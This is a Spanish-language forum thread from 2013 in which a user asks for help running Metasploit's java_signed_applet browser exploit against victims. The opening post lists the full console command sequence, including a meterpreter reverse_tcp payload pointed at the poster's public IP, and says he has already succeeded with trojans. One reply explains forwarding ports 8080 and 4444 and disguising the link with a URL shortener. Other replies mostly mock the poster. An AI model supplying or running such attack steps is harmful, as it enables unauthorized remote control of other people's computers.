buenas bros queria saber sobre este bug java_apllets es como un payload que ataka via internet mediante metasploit pero no lo entiendo ???????????
preguntas del video ?
primero abre los puertos 4444 y 8080
por que abre el puerto 8080 ese puerto no es para proxys o para servidores ?
otra cosa la victima tiene que tener instalado JAVA para que funke el ataque ?
y no entiendo para que sirve este website para crear un servidor ?
http://tinyurl.com/create.php
segun el video pone la ip publica .. como LHOST
cuando lo abro en otra maquina sale asi y no me da session a de cuenta que la web no me diera respuesta o
httt://tinyurl.com/194.123.77.33:8080/ me sale asi en la maquina atacada
(http://imageshack.us/a/img836/992/a0r5.jpg)
ya intente con troyanos y me fue bien quiero hacer esto alguien quien me pueda ayudar hacer el ataque por favor
[youtube=640,360]TbeAMnscYtg[/youtube]
pasos del ataque :
use exploit/multi/browser/java_signed_applet
show options
set SRVHOST 192.168.1.9
set URIPATH /
set PAYLOAD windows/meterpreter/reverse_tcp
show options
set LHOST 194.123.77.33 IP PUBLICA
exploit
Creo que bug java_applet es el exploit, payload es otra cosa.
tinyurl.com, es una pagina acortadora de links
Primero de todo lo que hace es meter un server local, luego si usas router rediriges los puertos de la shell y el server (8080, 4444) a tu ip interna, luego cojes tu ip externa la pasas por tiny url o por dodnde quieras y ya esta, pero dudo que te funcione así por las buenas, mucho firewall y antivirus hay.
Cita de: xustyx en 14 Septiembre 2013, 19:29 PM
Primero de todo lo que hace es meter un server local, luego si usas router rediriges los puertos de la shell y el server (8080, 4444) a tu ip interna, luego cojes tu ip externa la pasas por tiny url o por dodnde quieras y ya esta, pero dudo que te funcione así por las buenas, mucho firewall y antivirus hay.
Espera por que dices que el firewall y el antivirus ? como en el video si sale bro explicame eso sabes de algun ataque real con reverse shell o payload algo parecido ?
Acabo de probarla en red local y el avast salta con el exploit (se veia venir...). Al del video le debe salir porque el que infecta seguramente no tenga antivirus ni nada por el estilo.
Normal que salte el antivirus. Tendría narices que no saltara con ese exploit.
en serio salta el antivurus o no salta ?
Cita de: Socket en 17 Septiembre 2013, 15:36 PM
en serio salta el antivurus o no salta ?
En Metasploit eres bastante nuevo ¿verdad?
Deberías leer algo mas sobre como funciona y como es. En este foro hay mucha información sobre el tema. Estoy seguro que cuando leas algo mas, evitaras hacer este tipo de preguntas
TAN OBVIAS.
Ultimamente el foro esta lleno de lamers...
y de gente que borde que parece responder con asco, hay formas y formas
Sabés que es lo que pasa Tyrz? Es que es muy fácil decir "no se nada, alludenmen a huackear a mi nobia, ago lo que dise el video pero no puedo" y venir a llorar a un foro para que te solucionen todo.
Las cosas hay que hacerlas bien. Primero se investiga, luego se pregunta y por último uno termina aprendiendo. Esto es, claro, cuando el objetivo es adquirir conocimientos...
Cita de: MK-Ultra en 4 Octubre 2013, 15:45 PM
Es que es muy fácil decir "no se nada, alludenmen a huackear a mi nobia, ago lo que dise el video pero no puedo" y venir a llorar a un foro para que te solucionen todo.
Por aquí eso sucede un día si, y otro día también.
Cita de: MK-Ultra en 4 Octubre 2013, 15:45 PM
Sabés que es lo que pasa Tyrz? Es que es muy fácil decir "no se nada, alludenmen a huackear a mi nobia, ago lo que dise el video pero no puedo" y venir a llorar a un foro para que te solucionen todo.
Las cosas hay que hacerlas bien. Primero se investiga, luego se pregunta y por último uno termina aprendiendo. Esto es, claro, cuando el objetivo es adquirir conocimientos...
En realidad, en esos casos, es recomendable aconsejarles soltar el pc y volver a la escuela... :P
Merecen ser atacado.
(//)